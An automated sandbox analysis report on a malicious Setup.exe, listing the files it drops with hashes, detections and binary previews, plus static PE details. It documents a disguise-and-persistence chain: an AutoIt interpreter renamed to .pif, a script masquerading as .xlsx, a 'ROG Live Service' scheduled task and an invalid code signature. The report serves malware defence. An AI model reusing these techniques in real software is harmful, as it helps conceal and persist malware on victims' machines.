                                                                                                                                                                                                                              SSDEEP:6144:NLJBMdLZks8s4gOQv7G3q0ZuxPDJ4JJmfvvO:RJu1JRUq0ZQPDJ4JEO
                                                                                                                                                                                                                              MD5:8A91B92911FDCC70DB54D1E42E44B43B
                                                                                                                                                                                                                              SHA1:7C9EED64B5DE5DA453B09BE921115E45302385EA
                                                                                                                                                                                                                              SHA-256:13101E6D0314D350C9905AA4FB06C86BD57317E6D9C87A5A9913D4A56565B442
                                                                                                                                                                                                                              SHA-512:3D432A1A23B09B8CE067215C150AE6592E7D5D736D17C890F3ED8FAD1E93FB4F3F023A4BCD637C81A60D8499E493DA958A46683B15DE09E0BCEB610D3F579141
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....B.N............................`.............@.......................................@..................................................................0..tB..................................................0................................text............................... ..`.rdata... ......."..................@..@.data............b..................@....CRT......... .......X..............@..@.reloc..tB...0...D...Z..............@..Brua.................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\dfc85a81

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                              File Type:PNG image data, 2256 x 1266, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1222022
                                                                                                                                                                                                                              Entropy (8bit):7.990154874748457
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:24576:HzpXZUiYREqgUUSj1hEImaTBfu6LzuR4N0pzKwfe9Lf:ThinEJSj1hbVN5L7Nuaf
                                                                                                                                                                                                                              MD5:4615267061BD631365026A16EE70CCA1
                                                                                                                                                                                                                              SHA1:BB27190771097C240D846BB2666B366F3C6016AD
                                                                                                                                                                                                                              SHA-256:95E75DD101A71FE9F06C6D3104532907728812A0F9F7C5349CD9FDA0C148FB9E
                                                                                                                                                                                                                              SHA-512:4D13ED3F0D03B5E3E54A5B8669EE78BF8F8A086AF25F4B91A449DE566455104BE8DE5FBD7C1C14F7085C932872F47615C146C7B9E4C2BB0F4042962B2228B51A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR................H.. .IDATx..;...&..+.U.{.5.{...@{H..$....#..I.+Q..!.06A.;M.M.^."..{..@.{.....W..gFg...UY].]......:.2.A|...`...=..\..._@@@@...n....m0..@k.._&....._7."....M....uM..?.4.....? ?.9g..@S.~.1.?..&?".0w.......`)%0..UU.K.TUE....K..K)..eY:/U.u...RZkrw)%>{UV.A...&..J)|..,.o....n_.1&......]I.Xw.Kp.q..&.w...._...H@.6.......#.....$...$..uC...[c$.1p..R0`#$.P.-$....!.......g....-3...3..|..u;....l.1..U9\F..J..c|Zi....C...........~.a ...1.a..?s}.Pv.``.|.....K.....?..=.......Y>..3.l2..@.......Y.6r.#.o/........-......6w._..)....\.@5..cL*.......2z.....$.. .B......p"....}...u.[...I......0...v...H..M~D...".q........c...uc.$H....\.#....E...B.I>..@..(.g}...=Rx.B.....C.A.wW.1....V..Q....$.............S..".........P..........-.o..1...6.......R^.... ......,..........K%..X.T..d"....W.O.J.A.g....q..]b%|v........0..K.7=...k.....p!.^....Q.........{..I>.....]B..$..V..n....s....P.;..w..7..G...(.. C......G*.Y{w.q.".p..d..p.$4Mm........}.....A..

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\e05c5df6

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1036400
                                                                                                                                                                                                                              Entropy (8bit):7.567344532631297
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:y2k1aYDUJv0cn3fP9hm6UhoBWMgF/E9/S:yD1zoJBPu4WAa
                                                                                                                                                                                                                              MD5:E66E8E04B5E3415EB373DC6F63A6D3BF
                                                                                                                                                                                                                              SHA1:E11DD950F02ED16D6C7176A088E2D528927674E7
                                                                                                                                                                                                                              SHA-256:777963DBE94E1A22EC9A1C6CD262E700E69F2E1045831B8E738A2305792694B4
                                                                                                                                                                                                                              SHA-512:5208946E36DCA6E8FE7BFAE577C26F5A861D96B612F36C6F90316F5690F5703359D528AF568C8062759EF32AE5B558C73F8917208D8F98CF064E7B7B39E09098
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:#..8 ..8!..8 ..8!..8...8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8..hd.y..QC..KO.dw.\O.ds.JT..]N.hR.JA.ds.JT.8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8c.VI.YL.]e..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8c.JE.]i.LA.] ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8..vd..|.[R.WF..ve.~R.]W.S ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8V..........8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8 ..8

                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\7LUEA3.pif

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943784
                                                                                                                                                                                                                              Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                              MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                              SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                              SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                              SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: drivers-v1.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: getsetup3rd.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: paracms.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: getup.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\SPL3UE.xlsx

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5998227
                                                                                                                                                                                                                              Entropy (8bit):6.2868125845422
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:j22WJaM4PM5XZ/n0r4OGBE2ZfhEMHv6/8nkELfb5CWG1x6Oxz:j2zZ5XZHq2fiMPnkqCWG1x6m
                                                                                                                                                                                                                              MD5:7E51997869F0AFFE433246A2E5E05677
                                                                                                                                                                                                                              SHA1:33B64808A4ECF3CFB7249FAB50DD53A54E4B523B
                                                                                                                                                                                                                              SHA-256:52BAB3A2E53F7CEF4D612EE22D0CFC25E3684EE280F480B9AE987E360AA78F84
                                                                                                                                                                                                                              SHA-512:EA65EA9E673105B4964CBB01ADE50CC1F1819974720C4A1F99233F937B5B022D9BE37C25B7DA39B1B9D64026A94171C1B08B2686B5DC5A4BF2912627312D183C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:f.O............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.O......................................

                                                                                                                                                                                                                              C:\Windows\Tasks\ROG Live Service.job

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):232
                                                                                                                                                                                                                              Entropy (8bit):3.437954495767831
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:nYJgJ8fHlNQNAWFQtiEZGbky0lB3PlAnlP1:6gJmHYNAkQGbkVB3s3
                                                                                                                                                                                                                              MD5:8F4DF4C2CE5BAD29313CA9FFBAAF221F
                                                                                                                                                                                                                              SHA1:A457C6AE0FA8F630A4FE0166BB5CE393874EA0FC
                                                                                                                                                                                                                              SHA-256:ED2DED7A551CBB4191AC6378CBD617D222BFE2BFD8B41BB75B8BBA3CAC80A0B7
                                                                                                                                                                                                                              SHA-512:44C9228C06E7CC985EB287CAD93D3A223903FA1F4936885E179740B0476AB9CCE557DADDAE6F5A75586208AEA9CA73B02E0574CD5543C221AFEDF6F620F30494
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.....=.b{z.A...O..._F.......<... ................ .................... .C.:.\.U.s.e.r.s.\.c.a.l.i.\.D.e.s.k.t.o.p.\.S.e.t.u.p...e.x.e.........C.A.L.I.-.P.C.\.c.a.l.i...................0.........1.....................................

                                                                                                                                                                                                                              C:\dfbffdd\AutoIt3.exe

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\7LUEA3.pif
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943784
                                                                                                                                                                                                                              Entropy (8bit):6.621472142472864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:MghN1a6pzWZ12+f+Qa7N4nEIRQ1hOOLkF6av8uh:vhN1aQzJD4BuTxavfh
                                                                                                                                                                                                                              MD5:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                              SHA1:E264BA0E9987B0AD0812E5DD4DD3075531CFE269
                                                                                                                                                                                                                              SHA-256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
                                                                                                                                                                                                                              SHA-512:ACF740AAFCE390D06C6A76C84E7AE7C0F721731973AADBE3E57F2EB63241A01303CC6BF11A3F9A88F8BE0237998B5772BDAF569137D63BA3D0F877E7D27FC634
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......hm..,...,...,.....m.......o.......n.......[.-....h..8....h.......h..>...%t..%...%t......,........h..|....h..-....hc.-...,........h..-...Rich,...........................PE..L...R..Z.........."...............................@.......................................@...@.......@.........................|....P..h............J.......0.. v.........................../..........@............................................text............................... ..`.rdata..............................@..@.data...4p.......H..................@....rsrc...h....P......................@..@.reloc.. v...0...x..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\dfbffdd\cbdaghf.a3x

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\7LUEA3.pif
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5998227
                                                                                                                                                                                                                              Entropy (8bit):6.2868125845422
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:98304:j22WJaM4PM5XZ/n0r4OGBE2ZfhEMHv6/8nkELfb5CWG1x6Oxz:j2zZ5XZHq2fiMPnkqCWG1x6m
                                                                                                                                                                                                                              MD5:7E51997869F0AFFE433246A2E5E05677
                                                                                                                                                                                                                              SHA1:33B64808A4ECF3CFB7249FAB50DD53A54E4B523B
                                                                                                                                                                                                                              SHA-256:52BAB3A2E53F7CEF4D612EE22D0CFC25E3684EE280F480B9AE987E360AA78F84
                                                                                                                                                                                                                              SHA-512:EA65EA9E673105B4964CBB01ADE50CC1F1819974720C4A1F99233F937B5B022D9BE37C25B7DA39B1B9D64026A94171C1B08B2686B5DC5A4BF2912627312D183C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:f.O............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.O......................................

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):7.094768425761549
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 98.04%
                                                                                                                                                                                                                              • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                              • InstallShield setup (43055/19) 0.42%
                                                                                                                                                                                                                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                              File name:Setup.exe
                                                                                                                                                                                                                              File size:8'060'800 bytes
                                                                                                                                                                                                                              MD5:0bf89e05c575d4bcdcdadb17c7517c29
                                                                                                                                                                                                                              SHA1:1040de2dca7b63045e6f201b62ff782154e2693c
                                                                                                                                                                                                                              SHA256:8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b
                                                                                                                                                                                                                              SHA512:b096dde0fd1f39edaf9ee9cde8a279bd6e737e30afc763319a031f6704fa68dd384966e07ea01646fde3fd38f6f428a044f7e7efdf0fae0cce1e6c5503518a87
                                                                                                                                                                                                                              SSDEEP:98304:X1UEEIu0hvmDN++ePpfyKrX70nMNjbtNET4A04Am:FURIXBp8KrX70MNHLETB0Bm
                                                                                                                                                                                                                              TLSH:83869E17B2C8743DD06E0A3A983B675C993FB665262B8C475BF8484C4F366807D3EA47
                                                                                                                                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:74509878e0f8b0f0

                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Entrypoint:0x93215c
                                                                                                                                                                                                                              Entrypoint Section:.itext
                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x670FCC7E [Wed Oct 16 14:23:58 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                                                                              Import Hash:c51c565da9ce8624cd9a5b20fe63461d

                                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                                              • 21/09/2023 02:00:00 16/09/2026 01:59:59
                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                              • CN=Winsider Seminars & Solutions Inc., O=Winsider Seminars & Solutions Inc., L=Montr\xe9al, S=Quebec, C=CA
                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                              Thumbprint MD5:4CABCE3C1DBD4222FC4EE4272F7C367D
                                                                                                                                                                                                                              Thumbprint SHA-1:DABC572F9027D96E86B95852B2FD871CABC52300
                                                                                                                                                                                                                              Thumbprint SHA-256:85B8CB1D1FBF6BF39E47EAFE64D366F1ACDDA6766949F83E67BF6C72EC9BF29A
                                                                                                                                                                                                                              Serial:050A5A396D03EA60CD5368B3D7BAF7A6

                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              add esp, FFFFFFF0h
                                                                                                                                                                                                                              mov eax, 0091EAECh
                                                                                                                                                                                                                              call 00007FC0802D3589h
                                                                                                                                                                                                                              call 00007FC0807DF78Ch
                                                                                                                                                                                                                              call 00007FC0802CB963h
                                                                                                                                                                                                                              mov eax, eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x5fa0000x75.edata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5ef0000x3ac6.idata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6700000x191cb6.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x780bc00x2f3c0.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5fd0000x72c3a
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x5fc0000x18.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x5efa200x8f4.idata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x5f30000x6aa4.didata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x10000x52c2400x52c4008bac1e473b28b42354f0b64d481e58c4unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .itext0x52e0000x41780x42003ff3ba7d0bfc856a8d8980b53e0ffdf9False0.4564393939393939data6.111533303271676IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .data0x5330000x115340x11600e817cd13e86ce42480605ca1c7aeb338False0.5090771133093526data5.829006891865401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .bss0x5450000xa9e1c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .idata0x5ef0000x3ac60x3c0051b014339cd48e61d335055d992fa10eFalse0.319921875data5.222162309823883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .didata0x5f30000x6aa40x6c004d9726c0fb961f4b11a687b531274673False0.2312282986111111data5.041727112613991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .edata0x5fa0000x750x2004e255e95cda5e3eb09a9074ca1a39c0fFalse0.1875data1.3774752808317143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .tls0x5fb0000x580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .rdata0x5fc0000x5d0x20070fc3c2f84bd2a34898b92ec5dfcc4c2False0.189453125data1.394850704273433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .reloc0x5fd0000x72c240x72e00d79a287977bebc66c908700a6a0ade27False0.557065679406964data6.714014557917903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0x6700000x191cb60x191e00d03229118faa5add68e62cc6dd49cf6eFalse0.8988396675738725data7.793387895284203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              GO0x670fd00x12a586PNG image data, 2256 x 1266, 8-bit/color RGB, non-interlacedEnglishUnited States0.9967441558837891
                                                                                                                                                                                                                              UNICODEDATA0x79b5580x968fdata0.3783566406351348
                                                                                                                                                                                                                              UNICODEDATA0x7a4be80x9ebbdata0.4321889996308601
                                                                                                                                                                                                                              UNICODEDATA0x7aeaa40x8d6data0.5919540229885057
                                                                                                                                                                                                                              UNICODEDATA0x7af37c0xb4bcdata0.41804270770294805
                                                                                                                                                                                                                              UNICODEDATA0x7ba8380xd91edata0.44955201324169697
                                                                                                                                                                                                                              UNICODEDATA0x7c81580x2035OpenPGP Secret Key0.6761673741661614
